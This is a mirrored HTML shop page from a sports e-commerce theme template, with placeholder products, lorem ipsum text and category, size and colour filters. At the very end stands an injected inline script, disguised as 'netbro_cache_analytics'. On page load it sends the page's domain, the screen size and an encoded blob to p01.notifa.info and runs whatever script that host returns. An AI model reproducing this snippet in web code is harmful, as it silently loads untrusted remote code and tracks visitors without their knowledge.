<!doctype html>
<html class="no-js" lang="en">

<!-- Mirrored from preview.hasthemes.com/suparsport-preview/suparsport/shop.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 13 Oct 2019 12:44:39 GMT -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>Shop - SuperSport</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Favicon -->
    <link rel="shortcut icon" type="image/x-icon" href="img/favicon.ico">
    <!-- Fonts -->
    <link rel="stylesheet" href="css/montserrat.css">
    <!-- CSS -->
    <!-- Bootstrap CSS
	============================================ -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <!-- Icon Font CSS
	============================================ -->
    <link rel="stylesheet" href="css/material-design-iconic-font.min.css">
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <!-- Plugins CSS
	============================================ -->
    <link rel="stylesheet" href="css/plugins.css">
    <!-- Style CSS
	============================================ -->
    <link rel="stylesheet" href="style.css">
    <!-- Modernizer JS
	============================================ -->
    <script src="js/vendor/modernizr-2.8.3.min.js"></script>
</head>

<body>
<!-- Body main wrapper start -->
<div class="wrapper fix">

<!-- Header Area Start -->
<div id="header-area" class="header-area section">
    <div class="container">
        <div class="row">
            <div class="col-xs-12">
                <!-- Logo -->
                <a class="logo float-left" href="index.html"><img src="img/logo.png" alt=""></a>
                <!-- Mini Cart -->
                <div class="mini-cart float-right">
                    <a href="#"><i class="zmdi zmdi-shopping-basket"></i></a>
                </div>
                <!---- Menu ---->
                <div id="main-menu" class="main-menu float-right">
                    <nav>
                        <ul>
                            <li><a href="index.html">home</a></li>
                            <li><a href="about.html">about</a></li>
                            <li><a href="team.html">team</a></li>
                            <li><a href="fixture.html">fixture</a></li>
                            <li><a href="point-table.html">point table</a></li>
                            <li><a href="blog.html">blog</a>
                                <ul>
                                    <li><a href="blog.html">blog</a></li>
                                    <li><a href="blog-details.html">blog details</a></li>
                                </ul>
                            </li>
                            <li class="active"><a href="shop.html">shop</a>
                                <ul>
                                    <li><a href="shop.html">shop</a></li>
                                    <li><a href="product-details.html">product details</a></li>
                                    <li><a href="cart.html">cart</a></li>
                                    <li><a href="wishlist.html">wishlist</a></li>
                                    <li><a href="checkout.html">checkout</a></li>
                                </ul>
                            </li>
                            <li><a href="contact.html">contact</a></li>
                        </ul>
                    </nav>
                </div>
                <!---- Mobile Menu ---->
                <div class="mobile-menu"></div>
            </div>
        </div>
    </div>
</div>
<!-- Header Area End -->

<!-- Page Banner Area Start -->
<div id="page-banner-area" class="page-banner-area section">
    <div class="container">
        <div class="row">
            <div class="page-banner-title text-center col-xs-12">
                <h2>shop</h2>
            </div>
        </div>
    </div>
</div>
<!-- Page Banner Area End -->

<!-- Shop Page Area Start -->
<div id="shop-page-area" class="shop-page-area section pb-70 pt-120">
    <div class="container">
        <div class="row">
            <div class="col-md-9 col-xs-12 float-right mb-50">
                <div class="row">
					<!-- Shop Top Bar -->
					<div class="shop-top-bar text-center mb-50 col-xs-12">
						<!-- Product View Mode -->
						<ul class="view-mode float-left text-left">
							<li class="active"><a href="#grid-view" data-toggle="tab"><i class="zmdi zmdi-apps"></i></a></li>
							<li><a href="#list-view" data-toggle="tab"><i class="zmdi zmdi-view-list"></i></a></li>
						</ul>
						<!-- Product Short By -->
						<div class="pro-short-by text-left">
							<p>SHORT BY</p>
							<select>
								<option value="1">Default</option>
								<option value="2">Feature</option>
								<option value="3">Best Selling</option>
								<option value="4">Alphabetically, A-Z</option>
								<option value="5">Alphabetically, Z-A</option>
								<option value="6">Price, low to high</option>
								<option value="7">Price, high to low</option>
								<option value="8">Date, new to old</option>
								<option value="9">Date, old to new</option>
							</select>
						</div>
						<!-- Product Showing Per Page -->
						<div class="pro-showing float-right text-left">
							<p>showing</p>
							<select>
								<option value="1">16</option>
								<option value="2">20</option>
								<option value="3">24</option>
								<option value="4">28</option>
								<option value="5">32</option>
							</select>
						</div>
					</div>
                </div>
                <div class="tab-content row">
                    <div role="tabpanel" class="tab-pane active" id="grid-view">
                        <!-- Single Product -->
                        <div class="col-lg-4 col-sm-6 col-xs-12 mb-50">
                            <div class="product-item">
                                <!-- Product Image -->
                                <a href="#" class="image"><img src="img/product/1.jpg" alt=""></a>
                                <!-- Product Content -->
                                <div class="content">
                                    <!-- Product Title -->
                                    <h4 class="title"><a href="#">Title Product Here</a></h4>
                                    <!-- Product Category -->
                                    <h5 class="cat">Categories</h5>
                                    <div class="price-ratting fix">
                                       <!-- Product Price -->
                                        <h3 class="price float-left"><span>$</span>28</h3>
                                        <!-- Product Ratting -->
                                        <span class="ratting float-right">
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star-half"></i>
                                        </span>
                                    </div>
                                    <!-- Product Action Button -->
                                    <div class="action-btn fix">
                                        <a href="#" class="add-cart">ADD TO CART</a>
                                        <a href="#" class="wishlist"><i class="zmdi zmdi-favorite"></i></a>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- Single Product -->
                        <div class="col-lg-4 col-sm-6 col-xs-12 mb-50">
                            <div class="product-item">
                                <!-- Product Image -->
                                <a href="#" class="image"><img src="img/product/2.jpg" alt=""></a>
                                <!-- Product Content -->
                                <div class="content">
                                    <!-- Product Title -->
                                    <h4 class="title"><a href="#">Title Product Here</a></h4>
                                    <!-- Product Category -->
                                    <h5 class="cat">Categories</h5>
                                    <div class="price-ratting fix">
                                       <!-- Product Price -->
                                        <h3 class="price float-left"><span>$</span>28</h3>
                                        <!-- Product Ratting -->
                                        <span class="ratting float-right">
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star-half"></i>
                                        </span>
                                    </div>
                                    <!-- Product Action Button -->
                                    <div class="action-btn fix">
                                        <a href="#" class="add-cart">ADD TO CART</a>
                                        <a href="#" class="wishlist"><i class="zmdi zmdi-favorite"></i></a>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- Single Product -->
                        <div class="col-lg-4 col-sm-6 col-xs-12 mb-50">
                            <div class="product-item">
                                <!-- Product Image -->
                                <a href="#" class="image"><img src="img/product/3.jpg" alt=""></a>
                                <!-- Product Content -->
                                <div class="content">
                                    <!-- Product Title -->
                                    <h4 class="title"><a href="#">Title Product Here</a></h4>
                                    <!-- Product Category -->
                                    <h5 class="cat">Categories</h5>
                                    <div class="price-ratting fix">
                                       <!-- Product Price -->
                                        <h3 class="price float-left"><span>$</span>28</h3>
                                        <!-- Product Ratting -->
                                        <span class="ratting float-right">
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star-half"></i>
                                        </span>
                                    </div>
                                    <!-- Product Action Button -->
                                    <div class="action-btn fix">
                                        <a href="#" class="add-cart">ADD TO CART</a>
                                        <a href="#" class="wishlist"><i class="zmdi zmdi-favorite"></i></a>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- Single Product -->
                        <div class="col-lg-4 col-sm-6 col-xs-12 mb-50">
                            <div class="product-item">
                                <!-- Product Image -->
                                <a href="#" class="image"><img src="img/product/4.jpg" alt=""></a>
                                <!-- Product Content -->
                                <div class="content">
                                    <!-- Product Title -->
                                    <h4 class="title"><a href="#">Title Product Here</a></h4>
                                    <!-- Product Category -->
                                    <h5 class="cat">Categories</h5>
                                    <div class="price-ratting fix">
                                       <!-- Product Price -->
                                        <h3 class="price float-left"><span>$</span>28</h3>
                                        <!-- Product Ratting -->
                                        <span class="ratting float-right">
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star-half"></i>
                                        </span>
                                    </div>
                                    <!-- Product Action Button -->
                                    <div class="action-btn fix">
                                        <a href="#" class="add-cart">ADD TO CART</a>
                                        <a href="#" class="wishlist"><i class="zmdi zmdi-favorite"></i></a>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- Single Product -->
                        <div class="col-lg-4 col-sm-6 col-xs-12 mb-50">
                            <div class="product-item">
                                <!-- Product Image -->
                                <a href="#" class="image"><img src="img/product/1.jpg" alt=""></a>
                                <!-- Product Content -->
                                <div class="content">
                                    <!-- Product Title -->
                                    <h4 class="title"><a href="#">Title Product Here</a></h4>
                                    <!-- Product Category -->
                                    <h5 class="cat">Categories</h5>
                                    <div class="price-ratting fix">
                                       <!-- Product Price -->
                                        <h3 class="price float-left"><span>$</span>28</h3>
                                        <!-- Product Ratting -->
                                        <span class="ratting float-right">
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star-half"></i>
                                        </span>
                                    </div>
                                    <!-- Product Action Button -->
                                    <div class="action-btn fix">
                                        <a href="#" class="add-cart">ADD TO CART</a>
                                        <a href="#" class="wishlist"><i class="zmdi zmdi-favorite"></i></a>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- Single Product -->
                        <div class="col-lg-4 col-sm-6 col-xs-12 mb-50">
                            <div class="product-item">
                                <!-- Product Image -->
                                <a href="#" class="image"><img src="img/product/2.jpg" alt=""></a>
                                <!-- Product Content -->
                                <div class="content">
                                    <!-- Product Title -->
                                    <h4 class="title"><a href="#">Title Product Here</a></h4>
                                    <!-- Product Category -->
                                    <h5 class="cat">Categories</h5>
                                    <div class="price-ratting fix">
                                       <!-- Product Price -->
                                        <h3 class="price float-left"><span>$</span>28</h3>
                                        <!-- Product Ratting -->
                                        <span class="ratting float-right">
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star-half"></i>
                                        </span>
                                    </div>
                                    <!-- Product Action Button -->
                                    <div class="action-btn fix">
                                        <a href="#" class="add-cart">ADD TO CART</a>
                                        <a href="#" class="wishlist"><i class="zmdi zmdi-favorite"></i></a>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div role="tabpanel" class="tab-pane" id="list-view">
                        <!-- Single Product -->
                        <div class="col-xs-12 mb-50">
							<div class="list-product-item">
								<div class="image col-lg-4 col-sm-5 col-xs-12">
									<a href="#"><img src="img/product/1.jpg" alt="" /></a>
								</div>
								<div class="list-product-content col-lg-8 col-sm-7 col-xs-12">
                                    <!-- Product Title -->
                                    <h4 class="title"><a href="#">Title Product Here</a></h4>
                                    <div class="price-ratting fix">
                                       <!-- Product Price -->
                                        <h3 class="price float-left"><span>$</span>28</h3>
                                        <!-- Product Ratting -->
                                        <span class="ratting float-right">
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star-half"></i>
                                        </span>
                                    </div>
                                    <!-- Product Description -->
									<div class="list-product-dec">
										<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incidi  dunt a ut labore the  dolore magna aliqua. Ut enim ad minim veniam, quis nostrud in a exer citation.</p>
									</div>
                                    <!-- Product Action Button -->
                                    <div class="action-btn fix">
                                        <a href="#" class="add-cart">ADD TO CART</a>
                                        <a href="#" class="wishlist"><i class="zmdi zmdi-favorite"></i></a>
                                    </div>
								</div>
							</div>
                        </div>
                        <!-- Single Product -->
                        <div class="col-xs-12 mb-50">
							<div class="list-product-item">
								<div class="image col-lg-4 col-sm-5 col-xs-12">
									<a href="#"><img src="img/product/2.jpg" alt="" /></a>
								</div>
								<div class="list-product-content col-lg-8 col-sm-7 col-xs-12">
                                    <!-- Product Title -->
                                    <h4 class="title"><a href="#">Title Product Here</a></h4>
                                    <div class="price-ratting fix">
                                       <!-- Product Price -->
                                        <h3 class="price float-left"><span>$</span>28</h3>
                                        <!-- Product Ratting -->
                                        <span class="ratting float-right">
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star-half"></i>
                                        </span>
                                    </div>
                                    <!-- Product Description -->
									<div class="list-product-dec">
										<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incidi  dunt a ut labore the  dolore magna aliqua. Ut enim ad minim veniam, quis nostrud in a exer citation.</p>
									</div>
                                    <!-- Product Action Button -->
                                    <div class="action-btn fix">
                                        <a href="#" class="add-cart">ADD TO CART</a>
                                        <a href="#" class="wishlist"><i class="zmdi zmdi-favorite"></i></a>
                                    </div>
								</div>
							</div>
                        </div>
                        <!-- Single Product -->
                        <div class="col-xs-12 mb-50">
							<div class="list-product-item">
								<div class="image col-lg-4 col-sm-5 col-xs-12">
									<a href="#"><img src="img/product/3.jpg" alt="" /></a>
								</div>
								<div class="list-product-content col-lg-8 col-sm-7 col-xs-12">
                                    <!-- Product Title -->
                                    <h4 class="title"><a href="#">Title Product Here</a></h4>
                                    <div class="price-ratting fix">
                                       <!-- Product Price -->
                                        <h3 class="price float-left"><span>$</span>28</h3>
                                        <!-- Product Ratting -->
                                        <span class="ratting float-right">
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star-half"></i>
                                        </span>
                                    </div>
                                    <!-- Product Description -->
									<div class="list-product-dec">
										<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incidi  dunt a ut labore the  dolore magna aliqua. Ut enim ad minim veniam, quis nostrud in a exer citation.</p>
									</div>
                                    <!-- Product Action Button -->
                                    <div class="action-btn fix">
                                        <a href="#" class="add-cart">ADD TO CART</a>
                                        <a href="#" class="wishlist"><i class="zmdi zmdi-favorite"></i></a>
                                    </div>
								</div>
							</div>
                        </div>
                        <!-- Single Product -->
                        <div class="col-xs-12 mb-50">
							<div class="list-product-item">
								<div class="image col-lg-4 col-sm-5 col-xs-12">
									<a href="#"><img src="img/product/4.jpg" alt="" /></a>
								</div>
								<div class="list-product-content col-lg-8 col-sm-7 col-xs-12">
                                    <!-- Product Title -->
                                    <h4 class="title"><a href="#">Title Product Here</a></h4>
                                    <div class="price-ratting fix">
                                       <!-- Product Price -->
                                        <h3 class="price float-left"><span>$</span>28</h3>
                                        <!-- Product Ratting -->
                                        <span class="ratting float-right">
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star-half"></i>
                                        </span>
                                    </div>
                                    <!-- Product Description -->
									<div class="list-product-dec">
										<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incidi  dunt a ut labore the  dolore magna aliqua. Ut enim ad minim veniam, quis nostrud in a exer citation.</p>
									</div>
                                    <!-- Product Action Button -->
                                    <div class="action-btn fix">
                                        <a href="#" class="add-cart">ADD TO CART</a>
                                        <a href="#" class="wishlist"><i class="zmdi zmdi-favorite"></i></a>
                                    </div>
								</div>
							</div>
                        </div>
                        <!-- Single Product -->
                        <div class="col-xs-12 mb-50">
							<div class="list-product-item">
								<div class="image col-lg-4 col-sm-5 col-xs-12">
									<a href="#"><img src="img/product/1.jpg" alt="" /></a>
								</div>
								<div class="list-product-content col-lg-8 col-sm-7 col-xs-12">
                                    <!-- Product Title -->
                                    <h4 class="title"><a href="#">Title Product Here</a></h4>
                                    <div class="price-ratting fix">
                                       <!-- Product Price -->
                                        <h3 class="price float-left"><span>$</span>28</h3>
                                        <!-- Product Ratting -->
                                        <span class="ratting float-right">
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star"></i>
                                            <i class="zmdi zmdi-star-half"></i>
                                        </span>
                                    </div>
                                    <!-- Product Description -->
									<div class="list-product-dec">
										<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incidi  dunt a ut labore the  dolore magna aliqua. Ut enim ad minim veniam, quis nostrud in a exer citation.</p>
									</div>
                                    <!-- Product Action Button -->
                                    <div class="action-btn fix">
                                        <a href="#" class="add-cart">ADD TO CART</a>
                                        <a href="#" class="wishlist"><i class="zmdi zmdi-favorite"></i></a>
                                    </div>
								</div>
							</div>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <!-- Shop Bottom Bar -->
					<div class="shop-bottom-bar text-center col-xs-12">
						<!-- Product Pagination -->
						<div class="pagination float-left">
							<p>Showing 1 - 16 of 97 items</p>
							<ul class="float-left">
								<li><a href="#"><i class="zmdi zmdi-chevron-left"></i></a></li>
								<li class="active"><a href="#">1</a></li>
								<li><a href="#">2</a></li>
								<li><a href="#">3</a></li>
								<li><a href="#">4</a></li>
								<li><a href="#"><i class="zmdi zmdi-chevron-right"></i></a></li>
							</ul>
						</div>
						<!-- Product Showing Per Page -->
						<div class="pro-showing float-right text-left">
							<p>showing</p>
							<select>
								<option value="1">16</option>
								<option value="2">20</option>
								<option value="3">24</option>
								<option value="4">28</option>
								<option value="5">32</option>
							</select>
						</div>
					</div>
                </div>
            </div>
            <div class="col-md-3 col-xs-12">
				<!-- Single Shop Sidebar -->
                <div class="single-shop-sidebar mb-50">
                    <h4>Categories</h4>
                    <ul class="category-sidebar">
                        <li><a href="#">jersey</a></li>
                        <li><a href="#">cap</a></li>
                        <li><a href="#">boots</a></li>
                        <li><a href="#">T-Shart</a></li>
                        <li><a href="#">ball</a></li>
                        <li><a href="#">soocks</a></li>
                        <li><a href="#">glaves</a></li>
                    </ul>
                </div>
				<!-- Single Shop Sidebar -->
                <div class="single-shop-sidebar mb-50">
                    <h4>size</h4>
                    <ul class="size-sidebar">
                        <li><a href="#">s</a></li>
                        <li><a href="#">m</a></li>
                        <li><a href="#">l</a></li>
                        <li><a href="#">xl</a></li>
                        <li><a href="#">xxl</a></li>
                    </ul>
                </div>
				<!-- Single Shop Sidebar -->
                <div class="single-shop-sidebar mb-50">
                    <h4>color</h4>
                    <ul class="color-sidebar">
                        <li><a href="#">red</a></li>
                        <li><a href="#">blue</a></li>
                        <li><a href="#">green</a></li>
                        <li><a href="#">purple</a></li>
                        <li><a href="#">orange</a></li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
</div>
<!-- Point Table Area End -->

<!-- Breaking News Area Start -->
<div class="breaking-news-area section overlay pb-40 pt-40">
    <div class="container">
        <div class="row">
            <!-- Breaking News Wrapper -->
            <div class="news-wrapper col-xs-12">
                <h4>Breaking News :</h4>
                <!-- Breaking News Slider -->
                <div class="bnews-slider">
                    <a href="#">There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration.</a>
                    <a href="#">There are many variations of passages of Lorem Ipsum available.</a>
                    <a href="#">There are many variations of passages of Lorem Ipsum available, but the majority.</a>
                </div>
            </div>
        </div>
    </div>
</div>
<!-- Breaking News Area End -->

<!-- Footer Top Area Start -->
<div class="footer-top-area section pb-70 pt-100">
   <div class="footer-top-left-bg overlay"></div>
    <div class="container">
        <div class="row">
            <!-- Footer About -->
            <div class="col-md-5 col-xs-12 mb-30">
                <div class="footer-about">
                    <img src="img/logo.png" alt="">
                    <p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proiden</p>
                    <div class="social fix">
                        <a href="#"><i class="fa fa-facebook"></i></a>
                        <a href="#"><i class="fa fa-rss"></i></a>
                        <a href="#"><i class="fa fa-google-plus"></i></a>
                        <a href="#"><i class="fa fa-pinterest"></i></a>
                        <a href="#"><i class="fa fa-instagram"></i></a>
                    </div>
                </div>
            </div>
            <!-- Footer Twitter -->
            <div class="col-md-4 col-sm-6 col-xs-12 mb-30">
                <div class="twitter-widget">
                    <h3 class="title">Latest Tweets</h3>
                    <div class="single-twite">
                        <p>Duis aute irure <a href="#">@dolor</a> in rderiin voluptate velit esse cillum dolore eu ft nulla pariatur. Excepteur <a href="#">@sint</a> occaecat..</p>
                        <span>30 minutes ago</span>
                    </div>
                    <div class="single-twite">
                        <p>Duis aute irure <a href="#">@dolor</a> in rderiin voluptate velit esse cillum dolore eu ft </p>
                        <span>15 minutes ago</span>
                    </div>
                </div>
            </div>
            <!-- Footer Subscribe -->
            <div class="col-md-3 col-sm-6 col-xs-12 mb-30">
                <div class="subscribe-widget">
                    <h3 class="title">Newsletters</h3>
                    <div class="subscribe-form">
                        <form action="#">
                            <input type="text" placeholder="your email address">
                            <button class="submit"><i class="zmdi zmdi-mail-send"></i></button>
                        </form>
                    </div>
                    <p><span>Phone:</span> +98 996 554 658</p>
                    <p><span>email:</span> sport@email.com</p>
                </div>
            </div>
            
        </div>
    </div>
</div>
<!-- Footer Top Area End -->

<!-- Footer Bottom Area Start -->
<div class="footer-bottom-area section">
    <div class="container">
        <div class="row">
           
            <!-- Copyright -->
            <div class="copyright text-left col-sm-6 col-xs-12">
                <p>Copyright &copy; <span>Supar Sport</span>. 2016.All right reserved</p>
            </div>
            <!-- Author Credit -->
            <div class="author-credit text-right col-sm-6 col-xs-12">
                <p>Created by <a href="https://hastech.company/">Hastech</a> With <i class="fa fa-heart-o"></i></p>
            </div>
            
        </div>
    </div>
</div>
<!-- Footer Bottom Area End -->


</div>
<!-- Body main wrapper end -->

<!-- JS -->

<!-- jQuery JS
============================================ -->
<script src="js/vendor/jquery-1.12.0.min.js"></script>
<!-- Bootstrap JS
============================================ -->
<script src="js/bootstrap.min.js"></script>
<!-- Plugins JS
============================================ -->
<script src="js/plugins.js"></script>
<!-- Ajax Mail JS
============================================ -->
<script src="js/ajax-mail.js"></script>
<!-- Main JS
============================================ -->
<script src="js/main.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAuN%2b5wL0gfuWPr23%2b3EZfyj4w4qniSXKtCA6IeAqbRsvRNbQ13rnOZzVRdcFyBDYVJvIv8P6de8Lrh213zIaz%2bpvR7HFmhh%2bSuJbquTac3DHCH9YR6oO6nbtZSFmpho%2bcSf%2ffxmMLfujiBz9%2f3hKDvCAe0vhQ%2b1GLqU1U0ewYpC1wik4kA5H3IbUGDTWYg2psyGiLbKINelp9mbIIfmGyZlw0q3jw37a9ECfskmVEwj%2bxXcjpM6%2b2RavfgbyRoUnVJixDSqAjcnAAOp1cUD5uE1UVfGaMIZAklR2YS8oa3oh1cHvhyAnpKLqoNvUwscwUM77aBEvmwtvB7cBuWqyXEJ0ZsmaZs%2bZ0simP8NtP2GF%2bMyHQO6F0IAk7%2f2dv691Tvfa3XArTkYvVQAzMhaNqCGDygkWc9TJ5NqhSevLyut9Bo90D%2bCyC5qhmk5QQG2PrT7iePrChw5LGtKYqmxEaoHoGo9p1p2AXFrpJtoAPKBxmgkXCKpqDwevHWICGqt0xT4l4RrgeeyE%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>


<!-- Mirrored from preview.hasthemes.com/suparsport-preview/suparsport/shop.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 13 Oct 2019 12:44:39 GMT -->
</html>